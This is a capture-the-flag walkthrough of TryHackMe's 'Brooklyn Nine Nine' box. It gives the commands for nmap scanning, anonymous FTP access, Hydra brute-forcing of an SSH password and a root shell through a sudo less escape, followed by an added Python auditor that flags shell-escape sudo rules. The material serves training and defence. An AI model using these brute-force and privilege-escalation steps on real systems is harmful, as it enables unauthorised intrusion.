Challenges: Brooklyn Nine Nine (TryHackMe)


Welcome to Brooklyn Nine Nine, a beginner-friendly Linux CTF challenge hosted on TryHackMe. This machine focuses on basic enumeration, initial access via commonly exposed services, and privilege escalation using a well-known sudo misconfiguration. Whether you're new to CTFs or brushing up on your enumeration and privilege escalation skills, this box is a solid learning experience. Let’s dive into it with curiosity, a bit of patience, and your favorite terminal.
Deploy and get hacking
This room is aimed at beginner-level hackers, but anyone can try to hack this box. There are two main intended ways to root the box. If you find more, DM me on Discord at Fsociety2006.
The first step is running an nmap scan:
nmap -sC -sV -A <IP_Address>
nmap -sC -sV <IP_Address>
21/tcp ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1
80/tcp open http Apache httpd 2.4.29
find / -type f -name note_to_jake.txt 2> /dev/null
User flag
With FTP, we can check for any helpful details about the users:
ftp <IP_Address>
Name: Anonymous
Password: (just press Enter, no password needed)
ftp> ls
ftp> get note_to_jake.txt
Users: Jake & Amy, queue: Holt, company: nine nine
Inspecting the site showed a hint of steganography. I tried using tools like steghide, strings, exiftool, and binwalk, but it wasn’t helpful. I wasn’t able to extract anything that would help us get the credentials of a user.
Using Hydra against SSH helped find Jake’s password, which would be used for remote SSH authentication.
hydra -I -l jake -P /usr/share/wordlists/rockyou.txt ssh://<IP_Address>
ssh jake@<IP_Address>
find / -type f -name user.txt 2> /dev/null
Root flag
After finding the user, we now have to look for a way to escalate privileges to root. First, we check sudo -l:
(ALL) NOPASSWD: /usr/bin/less
With this, we’ll use online resources like GTFOBins to check the commands we can use to escalate privileges. In this case, we’ll search for less and sudo on the platform.
We’ll use this command:
sudo less /etc/profile
which will launch with vim. Use the letter v and scroll to the end, or to where you have /etc/profile, and type !/bin/sh
then exit with :wq
You’ll then confirm you are root and find the root flag.
This machine walks us through several foundational skills in penetration testing: port scanning, brute-forcing services, basic file inspection, and finally, privilege escalation using less and sudo. It reinforces how crucial thorough enumeration is, and how seemingly harmless misconfigurations like giving sudo access to simple commands can lead to full system compromise. The hint “A recursive call” cleverly alludes to the ability of less to invoke a shell through nested tools like vi. Overall, a great exercise in sharpening your hacker instincts!
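To catch this kind of sudo rule during a host review, the following added example (not part of the original write-up or the room) parses sudo -l output and flags rules that grant shell-escape-capable binaries such as less without the NOEXEC tag. The binary list, the function name and all sample lines except the less rule shown above are assumptions constructed for illustration.

```python
import re

# Binaries that can start a shell or editor from inside themselves. This is a
# small constructed subset of what GTFOBins catalogues; extend it for real use.
SHELL_ESCAPE_BINARIES = {"less", "more", "man", "vi", "vim", "nano", "find", "awk", "env"}

RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<rest>.+)$")  # "(ALL) NOPASSWD: /usr/bin/less"
TAG_RE = re.compile(r"([A-Z_]+):\s*")                              # sudoers tags such as NOPASSWD:
OPPOSITE = {"EXEC": "NOEXEC", "PASSWD": "NOPASSWD"}               # a later tag cancels its opposite


def audit_sudo_rules(sudo_l_output):
    """Return (runas, command, risk, nopasswd) for each risky rule in `sudo -l` output."""
    findings = []
    for line in sudo_l_output.splitlines():
        rule = RULE_RE.match(line)
        if not rule:
            continue  # header and Defaults lines
        tags = set()  # tags carry over to later commands on the same rule line
        for item in rule.group("rest").split(","):
            item = item.strip()
            while (tag := TAG_RE.match(item)):
                tags.discard(OPPOSITE.get(tag.group(1)))
                tags.add(tag.group(1))
                item = item[tag.end():]
            if not item:
                continue
            binary = item.split()[0].rsplit("/", 1)[-1]
            if item == "ALL":
                risk = "unrestricted"
            elif binary in SHELL_ESCAPE_BINARIES and "NOEXEC" not in tags:
                risk = "shell-escape"
            else:
                continue
            findings.append((rule.group("runas"), item, risk, "NOPASSWD" in tags))
    return findings


# Constructed sample; only the first rule line is the one shown in this write-up.
SAMPLE = """\
User jake may run the following commands on host:
    (ALL) NOPASSWD: /usr/bin/less
    (root) NOEXEC: /usr/bin/less /var/log/syslog
    (root) /usr/sbin/reboot, /usr/bin/vim /etc/hosts
"""

if __name__ == "__main__":
    for finding in audit_sudo_rules(SAMPLE):
        print(finding)
```

NOEXEC blocks the shell escape, but less can still open other files as the target user, so removing the rule is the stronger fix.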
From anonymous FTPs to GTFOBinning our way to root—Brooklyn Nine Nine was more than just a precinct this time. It was a playground for hackers in training like me. Stay curious, take notes, and keep hacking. Nine Nine! 🚓💻
Written by

Jebitok